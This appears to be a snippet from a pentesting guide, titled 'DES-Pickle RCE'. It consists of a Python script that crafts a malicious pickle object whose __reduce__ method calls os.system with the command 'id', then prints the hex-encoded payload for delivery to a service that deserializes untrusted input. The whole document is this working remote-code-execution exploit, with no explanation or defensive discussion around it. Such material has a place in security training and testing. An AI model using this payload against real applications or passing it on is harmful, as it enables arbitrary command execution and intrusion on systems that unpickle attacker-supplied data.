DES-Pickle RCE - Pentesting Web

import pickle
import os
import binascii
class Exploit(object):
def __reduce__(self):
return (os.system, ('id',))
if __name__ == '__main__':
print(binascii.hexlify(pickle.dumps(Exploit())))


Mis à jour